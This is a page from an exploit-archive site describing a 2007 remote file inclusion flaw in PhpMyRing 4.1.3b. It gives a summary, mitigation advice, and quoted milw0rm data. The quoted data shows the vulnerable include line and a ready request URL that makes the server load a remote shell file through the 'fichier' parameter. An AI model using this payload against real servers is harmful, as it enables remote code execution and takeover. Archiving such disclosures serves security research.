Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PhpMyRing - exploit.company
header-logo
Suggest Exploit
vendor:
PhpMyRing
by:
ajann
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: PhpMyRing
Affected Version From: <= 4.1.3b
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability

PhpMyRing <= 4.1.3b is vulnerable to remote file inclusion. The vulnerability allows an attacker to include a remote file through the 'fichier' parameter in 'leslangues.php' script. This can be exploited to execute arbitrary code on the affected server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PhpMyRing or apply appropriate security patches provided by the vendor. Additionally, ensure that user-supplied input is properly validated and sanitized before being used in file inclusion operations.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.microniko.net/phpmyring/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include ($fichier.".php");
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]//lang/leslangues.php?fichier=[SHELL]

Example:

//lang/leslangues.php?fichier=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-31]

Navigation

Suggest Exploit

Services By CQR